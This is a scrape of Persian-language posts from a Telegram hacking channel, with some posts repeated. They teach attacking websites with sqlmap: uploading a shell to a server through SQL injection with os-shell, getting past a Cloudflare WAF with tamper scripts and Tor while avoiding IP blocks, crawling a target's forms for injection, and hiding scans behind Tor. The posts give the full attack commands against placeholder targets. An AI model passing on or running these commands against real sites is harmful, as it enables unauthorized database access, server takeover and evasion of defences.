Media is too big
VIEW IN TELEGRAM
اموزش نحوه اپلود شل روی سرور وب سایت از طریق اسیب پذیری SQL INJECTION با ابزار SQLMAP و پارامتر os-shell🕷
خلاصه : شما تو این ویدیو یاد میگیرد که چطور با یکی از پارامتر های SQLMAP یک شل رو اپلود کنید!🪝
Method one
#WebHacking #Sql_Injection #Sqlmap
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
خلاصه : شما تو این ویدیو یاد میگیرد که چطور با یکی از پارامتر های SQLMAP یک شل رو اپلود کنید!🪝
#WebHacking #Sql_Injection #Sqlmap
┌<(channel>>>>)-[~]>
└< (main)* >─» @Team_Exploit
نحوه بای پس WAF با sqlmap
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.
شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین میتوانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.
برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید
sudo apt install privoxy -yدر نهایت حمله را شروع کنید!
sudo /etc/init.d/privoxy start
python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor#Sqlmap
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
تزریق Sql بر روی فرم ها
1. sqlmap -u target.com/registration --dbs --forms --crawl=2
2. تمام پیوندهای دارای فیلد ورودی را می خزد
3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید
#Sqli #Sqlmap
1. sqlmap -u target.com/registration --dbs --forms --crawl=2
2. تمام پیوندهای دارای فیلد ورودی را می خزد
3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید
#Sqli #Sqlmap
Team Exploit
تزریق Sql بر روی فرم ها 1. sqlmap -u target.com/registration --dbs --forms --crawl=2 2. تمام پیوندهای دارای فیلد ورودی را می خزد 3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید #Sqli #Sqlmap
اگه میخواید تو Sqlmap هنگام اسکن از تور استفاده کنید
از این کامند استفاده کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
از این کامند استفاده کنید
sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5#Sqli #Sqlmap
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit